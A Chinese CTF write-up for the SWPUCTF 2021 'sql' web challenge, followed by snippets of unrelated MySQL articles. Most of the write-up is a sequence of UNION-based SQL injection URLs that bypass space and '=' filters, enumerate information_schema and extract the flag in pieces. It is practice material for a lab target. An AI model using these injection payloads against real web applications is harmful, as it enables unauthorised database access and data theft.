[SWPUCTF 2021 新生赛]sql

时间：2023-09-02 22:11:18浏览次数：38

标签：group 23 union SWPUCTF wllm flag 2021 sql select

[SWPUCTF 2021 新生赛]sql

题目来源：nssctf

题目类型：web

涉及考点：SQL注入

1. 又是熟悉的杰哥，先尝试判断闭合类型、回显列数

判断闭合类型：

/?wllm=1：

/?wllm=1'：

/?wllm=1'%23：

%23是#的url编码

判断得到闭合类型为单引号闭合

判断回显列数：

/?wllm=1' group by 3%23：

这里是过滤了空格，我们用/**/来绕过

/?wllm=1'/**/group/**/by/**/3%23：

/?wllm=1'/**/group/**/by/**/4%23：

判断得回显列数为3

2. 尝试union注入

判断回显位：

/?wllm=-1'/**/union/**/select/**/1,2,3%23：

爆库名：

爆表名：

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23

此处是过滤了=，用like来绕过

我们直接查看LTLT_flag的内容，爆字段名：

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()%23

查询flag：

/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

发现显示不全，我们使用substring连接：

/?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(flag),1,30)/**/from/**/test_db.LTLT_flag%23

发现被过滤了，换mid试试：

/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23

/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),21,20)/**/from/**/test_db.LTLT_flag%23

/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),41,20)/**/from/**/test_db.LTLT_flag%23

注意：mid最大回显长度为20个字符

拼接一下即可得到flag：

NSSCTF{ad72b551-c7a7-4a13-abf2-3a0311d8d7cf}

日期：2023.9.2

作者：y0Zero

标签：group,23,union,SWPUCTF,wllm,flag,2021,sql,select
From： https://www.cnblogs.com/bkofyZ/p/17674252.html

重复索引检查mysql pt-duplicate-key-checker
索引对于优化数据库中的查询执行时间至关重要，但是索引数量过多或冗余会对性能产生负面影响。虽然pt-duplicate-key-checker是识别MySQL中重复或冗余索引的首选工具，但它可能无法捕获所有重复。测试环境，mysql5.7.27建表结mysql[localhost:5727]{root}(sbtest)>CREATETABLE`sbt......
MYSQL数据库备份还原，并还原到最新状态(mysqldump)
启用二进制日志文件vim/etc/my.cnf配置文件位置及文件名根据实际情况确定<br>sql_log_bin=on|off:是否记录二进制日志，默认为on在需要的时候设置为off=""<br>log_bin="/PATH/BIN_LOG_FILE:指定二进制日志文件位置;"通常单独存放到与数据库不同的机器中=""<=""p=""></br>......
IPV6配置mysql
一、mysql参数影响mysql配置文件my.cnf可以配置一个参数bind-address该参数默认为*，意思是全网监听(可以是ipv4也可以是ipv6)如果该参数设置成ipv4地址，则mysql的3306端口监听ipv4地址如果该参数设置生ipv6地址，则mysql的3306端口监听ipv6地址二、mysql主从配置CHANGEMASTERTO......
【题解】NOIP2021
咕咕咕的东西总是要补的。A.报数题目描述：报数游戏是一个广为流传的休闲小游戏。参加游戏的每个人要按一定顺序轮流报数，但如果下一个报的数是\(7\)的倍数，或十进制表示中含有数字\(7\)，就必须跳过这个数，否则就输掉了游戏。在一个风和日丽的下午，刚刚结束SPC20nn比赛的小r和......
MySQL的基本语句
目录1.0数据库操作2.0数据表操作2.1表的创建2.2表的修改2.2.1表中字段的添加2.2.2表中字段的修改2.2.3表中字段的删除2.3表的查询2.3.1查询数据库中所有的表2.3.2查询表结构2.4表的删除2.5表中数据的操作2.5.1表数据的查询2.5.1.1表中数据的简单查询2.5.1.2表中数据......
CentOS6.5安装mysql 远程登录
第1步、yum安装mysql[[email protected]]#yum-yinstallmysql-server直到出现结果：第2步、设置开机启动[[email protected]]#chkconfigmysqldon这步没提示第3步、启动mysql服务[[email protected]]#servicemysqldstartshell提示：第4步、修改r......
sql server id在字符串集中的 sql plus主机字符串
SQL*PLUS里主机字符串主机字符串就是描述主机的字符串，通常在oracle_home/network/admin下的tnsnames.ora文件里面配置主机字符串包如下其中MYORCL就是主机字符串MYORCL=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost)(PO......
mysql索引(转)
转载:https://www.php.cn/faq/493277.html一、数据结构区分1.1.B+tree索引根据存储方式,mysql可以分为B+tree索引和哈希索引B+tree索引可以进行全键值、键值范围和键值前缀查询1.2.哈希索引哈希索引也称为散列索引或 HASH索引。MySQL目前仅有MEMORY存储引擎和HEAP存......
在SQL server中如何写存储过程
总结一下SQLserver中如何存储。USE[SSQADM] ----Use是跳转到哪个数据库，对这个数据库进行操作。GO ----GO向SQLServer实用工具发出一批Transact-SQL语句结束的信号,相当于提交上面的SQL语句。----GO是把t-sql语句分批次执行。（一步成功了才会执行下一......
mysql decode()
mysqldecode() 举例： oracle： select decode(pay_name, ' aaaa ' , ' bbb ' ,pay_name), sum (comm_order), sum (suc_order), sum (suc_amount) From payment.order_tab group by decode(pay_name, ' aaaaa ' , ' bb......

[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql

1. 又是熟悉的杰哥，先尝试判断闭合类型、回显列数

2. 尝试union注入

相关文章

赞助商

阅读排行